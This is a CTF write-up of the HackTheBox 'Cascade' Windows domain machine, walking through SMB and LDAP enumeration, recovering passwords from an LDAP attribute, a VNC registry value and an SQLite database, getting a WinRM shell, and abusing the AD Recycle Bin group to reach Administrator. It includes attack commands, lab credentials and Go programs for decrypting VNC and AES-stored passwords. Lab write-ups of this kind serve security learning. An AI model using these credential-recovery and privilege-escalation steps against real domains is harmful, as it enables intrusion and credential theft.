CTF-Writeups/HackTheBox/Cascade.md
2021-12-27 01:52:03 +05:00


HackTheBox-Cascade

NMAP


PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:            
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-26 11:29:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn  
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?                                          
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-26T11:30:38
|_  start_date: 2021-12-26T11:26:31 

PORT 139/445 (SMB)

We can try to see if null authentication is allowed on SMB, and whether it lets us list and access shares

Trying enum4linux-ng, which attempts to list usernames over RPC (Remote Procedure Call) using null authentication

This could also be done with windapsearch, which is written in Go

So we get pretty much the same results; let's use grep and awk to filter out the usernames and save them in a file

/opt/windap/windapsearch-linux-amd64 -d cascade.local -m users | grep sAMAccountName | awk -F': ' '{print $2}'

Using kerbrute to see which of these are valid usernames: out of 15 users, 11 are valid

Kerbrute does check for pre-authentication being disabled, but just to be sure I also used impacket's GetNPUsers script

So I went on to use ldapsearch to see if I could get some information out of the users' properties, such as when the password was last set, or maybe even find plain text passwords

ldapsearch -x -LLL -h 10.10.10.182 -D 'cn=USER,ou=users,dc=cascade,dc=local' -b "dc=cascade,dc=local" 

This shows us a ton of information, but we can save the results to a file and use grep to filter our search

cat ldap_info | grep cascade

I then just grepped for cascade and found a base64 encoded text in a cascadeLegacyPwd field under the r.thompson user

On decoding the base64 text we get clear text; maybe this could be his password, so to verify it we can use kerbrute's passwordspray
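The grep-and-decode step above can be done in one pass over the ldapsearch output, which is also what a defender would run to audit a directory for custom attributes holding credentials. The Go program below is an added example, not part of the writeup: it parses LDIF (entries separated by blank lines, `name: value` lines, folded continuation lines starting with a space) and reports every occurrence of the attribute names it is told to look for, decoding base64 values when they turn out to be printable text. The sample LDIF embedded in it is constructed, not the dump from the box; its `cascadeLegacyPwd` value is simply the base64 form of the r.thompson password that appears later in this writeup.

```go
package main

import (
	"bufio"
	"encoding/base64"
	"fmt"
	"strings"
)

// Constructed sample of ldapsearch output (LDIF); not the real dump from the box.
const sampleLDIF = `dn: CN=r.thompson,OU=Users,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=e.user,OU=Users,DC=cascade,DC=local
objectClass: user
sAMAccountName: e.user
description: nothing unusual on this account
`

// Finding is one suspicious attribute value tied to the account it was found on.
type Finding struct {
	Account   string // sAMAccountName of the entry
	Attribute string // attribute name as it appeared
	Raw       string // value as printed by ldapsearch
	Decoded   string // base64-decoded value, empty if it is not printable text
}

// splitEntries cuts LDIF into entries (separated by blank lines) and unfolds
// continuation lines, which LDIF marks with a single leading space.
func splitEntries(ldif string) [][]string {
	var entries [][]string
	var cur []string
	sc := bufio.NewScanner(strings.NewReader(ldif))
	for sc.Scan() {
		line := sc.Text()
		switch {
		case line == "":
			if len(cur) > 0 {
				entries = append(entries, cur)
				cur = nil
			}
		case strings.HasPrefix(line, " ") && len(cur) > 0:
			cur[len(cur)-1] += line[1:]
		default:
			cur = append(cur, line)
		}
	}
	if len(cur) > 0 {
		entries = append(entries, cur)
	}
	return entries
}

// parseAttr splits "name: value" (or "name:: base64value") into its parts.
func parseAttr(line string) (name, value string, ok bool) {
	i := strings.Index(line, ":")
	if i <= 0 || strings.HasPrefix(line, "#") {
		return "", "", false
	}
	rest := strings.TrimPrefix(line[i+1:], ":") // "::" means the value is base64-wrapped
	return line[:i], strings.TrimSpace(rest), true
}

// decodeIfText tries base64 and keeps the result only if it is printable ASCII.
func decodeIfText(value string) string {
	b, err := base64.StdEncoding.DecodeString(value)
	if err != nil || len(b) == 0 {
		return ""
	}
	for _, c := range b {
		if c < 0x20 || c > 0x7e {
			return ""
		}
	}
	return string(b)
}

// ScanLDIF returns every occurrence of the named attributes (compared case-insensitively,
// as LDAP attribute names are), with the decoded value when it is readable text.
func ScanLDIF(ldif string, suspect []string) []Finding {
	var findings []Finding
	for _, entry := range splitEntries(ldif) {
		account := ""
		var hits []Finding
		for _, line := range entry {
			name, value, ok := parseAttr(line)
			if !ok {
				continue
			}
			if strings.EqualFold(name, "sAMAccountName") {
				account = value
			}
			for _, s := range suspect {
				if strings.EqualFold(name, s) {
					hits = append(hits, Finding{Attribute: name, Raw: value, Decoded: decodeIfText(value)})
				}
			}
		}
		for i := range hits {
			hits[i].Account = account // fill in once the whole entry has been read
		}
		findings = append(findings, hits...)
	}
	return findings
}

func main() {
	for _, f := range ScanLDIF(sampleLDIF, []string{"cascadeLegacyPwd"}) {
		fmt.Printf("%s: %s=%q decodes to %q\n", f.Account, f.Attribute, f.Raw, f.Decoded)
	}
}
```

Piping a real `ldapsearch -LLL` dump into it instead of the embedded sample is a one-line change in `main`; the attribute list can be widened to whatever non-standard names the schema shows.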

But we can only log in to SMB with it

Having user credentials, we can try to list any accounts that have an SPN associated with them, but there weren't any such accounts

In the SMB share we do have some files that we can access

I decided to come back to these shares later and first enumerate the AD through the Python BloodHound ingestor

python3 /opt/Python-Bloodhound/bloodhound.py -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -c all -ns 10.10.10.182

After getting those JSON files we need to import them into the BloodHound GUI

But I didn't find anything we can do with this user

All we could gather was that r.thompson is a member of the IT group

So going back to the SMB shares, we see a folder named IT in the Data share

I downloaded every file I could find from this directory

Looking at the HTML file, I didn't get anything juicy

So this was what we could gather as r.thompson; looking at the VNC install.reg file, there was a password in hex

Looking at this article, it seems that we can get the plain text password

https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/

I found a one-liner that decrypts the VNC hex password to plain text

echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

And with this we got s.smith's password
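The one-liner works because VNC does not hash the stored password; it encrypts it with DES-CBC under a fixed key that ships with every VNC server (the `-K` value above), a zero IV and no padding, so anyone who can read the registry value can reverse it. The Go program below is an added example, not code from the writeup or from any VNC project: it does the same decryption with the standard library, which is handy where an OpenSSL 3 build refuses `-des-cbc` because single DES has moved to the legacy provider. It takes the hex value from the writeup's registry export and includes the forward direction so the round trip can be checked.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"fmt"
)

// vncFixedKey is the hard-coded DES key VNC servers use to obfuscate the stored
// password; it is the same key the openssl one-liner passes with -K.
var vncFixedKey = []byte{0xe8, 0x4a, 0xd6, 0x60, 0xc4, 0x72, 0x1a, 0xe0}

// vncCipher builds the DES block cipher with the fixed key and the all-zero IV
// (the -iv 0000000000000000 of the one-liner).
func vncCipher() (cipher.Block, []byte, error) {
	block, err := des.NewCipher(vncFixedKey)
	if err != nil {
		return nil, nil, err
	}
	return block, make([]byte, des.BlockSize), nil
}

// DecryptVNCPassword takes the hex blob from the registry export and returns the
// plain text. Trailing NUL bytes are stripped because VNC zero-pads passwords
// shorter than 8 characters.
func DecryptVNCPassword(hexBlob string) (string, error) {
	ct, err := hex.DecodeString(hexBlob)
	if err != nil {
		return "", fmt.Errorf("bad hex: %w", err)
	}
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ct), des.BlockSize)
	}
	block, iv, err := vncCipher()
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct) // --nopad: raw blocks, nothing to strip
	return string(bytes.TrimRight(pt, "\x00")), nil
}

// EncryptVNCPassword is the forward direction, included for the round-trip check;
// like VNC itself it keeps only the first 8 characters and zero-pads shorter ones.
func EncryptVNCPassword(password string) (string, error) {
	padded := make([]byte, des.BlockSize)
	copy(padded, password) // copy stops at 8 bytes, so longer input is truncated
	block, iv, err := vncCipher()
	if err != nil {
		return "", err
	}
	ct := make([]byte, des.BlockSize)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return hex.EncodeToString(ct), nil
}

func main() {
	// The hex value from the writeup's VNC install.reg.
	pw, err := DecryptVNCPassword("6bcf2a4b6e5aca0f")
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("recovered VNC password: %q\n", pw)
}
```

The 8-character cap is worth remembering from the defensive side: a "strong" 20-character VNC password is silently truncated before it is stored, and the stored form is reversible by anyone with read access to the registry key or an exported .reg file.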

Verifying with crackmapexec to see if we can get a shell through WinRM

We can now use evil-winrm to get a shell as the s.smith user

After getting a shell, one thing to note is that this user is in the Audit Share group; back when we listed the shares there was a share named Audit$ that we weren't able to access, but now we can

Grabbing the Audit.db file, we need to open it with DB Browser for SQLite, which we can install on Ubuntu (it's available by default on Kali Linux)

Here we can see the table names and the fields; to view the data in these tables, switch to Browse Data

DeletedUserAudit doesn't have anything here; switching the table to Ldap, we see the same username that was in that HTML file and its password, which is encrypted

From here we can't move forward using only Linux, as we need to analyze the DLL and the executable, which can only be done on Windows (regretting the dual boot)

So after switching to Windows and downloading dnSpy to analyze the executable and DLL files, I was able to retrieve two strings: one was an encrypted string and the other was the IV

Opening the exe, we can navigate to the main module and see the secret key to decrypt the base64 string we already got from the db file

Furthermore, opening the DLL file, we can find the IV and see that it's using CBC mode encryption

I visited this site https://www.devglan.com/online-tools/aes-encryption-decryption because when trying CyberChef I didn't understand what format I needed to specify; I was having difficulty specifying the output to be in base64, and that site gave me the option clearly

And now all that is left is to decode this text from base64
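Once the key (from the exe), the IV (from the DLL) and the base64 ciphertext (from the Ldap table) are in hand, the decryption is a few lines of standard-library code, and doing it locally avoids pasting recovered secrets into a third-party web form. The Go program below is an added example, not the box's own code: the key and IV in it are constructed stand-ins, not the values recovered from the binaries, and it assumes AES-128 (16-byte key) with PKCS#7 padding, which is what a .NET AES-CBC implementation produces by default; if the binary shows a different key length or padding, adjust those two points. It includes the forward direction so it can generate its own ciphertext and show the round trip.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// Constructed stand-ins for the key found in the executable and the IV found in the
// DLL. They are NOT the real values from the box.
var (
	demoKey = []byte("example-key-0123") // 16 bytes => AES-128 (assumed key size)
	demoIV  = []byte("example-iv-45678") // 16 bytes, exactly one AES block
)

// pkcs7Unpad validates and strips PKCS#7 padding; a failure here is usually the
// first sign that the key or IV is wrong.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("invalid padded length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("invalid padding byte")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("inconsistent padding")
		}
	}
	return b[:len(b)-n], nil
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

// DecryptDBPassword takes the base64 value exactly as stored in the Ldap table of
// Audit.db and returns the plain text password.
func DecryptDBPassword(b64 string, key, iv []byte) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", fmt.Errorf("bad base64: %w", err)
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ct), aes.BlockSize)
	}
	if len(iv) != aes.BlockSize {
		return "", errors.New("IV must be exactly one AES block")
	}
	block, err := aes.NewCipher(key) // accepts 16, 24 or 32-byte keys
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	plain, err := pkcs7Unpad(pt)
	if err != nil {
		return "", err
	}
	return string(plain), nil
}

// EncryptDBPassword is the forward direction, mirroring how the service would have
// stored the value; it lets the example produce its own ciphertext.
func EncryptDBPassword(plain string, key, iv []byte) (string, error) {
	if len(iv) != aes.BlockSize {
		return "", errors.New("IV must be exactly one AES block")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	padded := pkcs7Pad([]byte(plain))
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(ct), nil
}

func main() {
	stored, _ := EncryptDBPassword("Example-Pass1", demoKey, demoIV) // constructed plaintext
	fmt.Println("value as it would sit in the Ldap table:", stored)
	pw, err := DecryptDBPassword(stored, demoKey, demoIV)
	fmt.Printf("decrypted: %q (err=%v)\n", pw, err)
}
```

A detail worth knowing when the recovered IV is uncertain: in CBC a wrong IV only garbles the first block, and a multi-block password still unpads cleanly, so the tail of the output can look right while the head is nonsense. The test below checks exactly that behaviour.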

Using kerbrute again to check which user this password belongs to (although it's very clear, I did it anyway)

Logging in with this user, we can see that we are in the AD Recycle Bin group

Now looking back at the meeting note, I understood what it meant: being in this group we need to recover the deleted object, so when we get the password of TempAdmin we get the password for the Administrator account

Searching for ways to abuse this group, I found that we can read deleted AD objects using the AD management PowerShell module, so I downloaded the AD module from here

https://github.com/samratashok/ADModule

After listing the deleted objects we can again see the cascadelegacypwd field, which shows a base64 encoded password

Now the moment of truth: according to the meeting notes we should be able to log in to the Administrator account with this password

Further, we can dump hashes using impacket's secretsdump.py
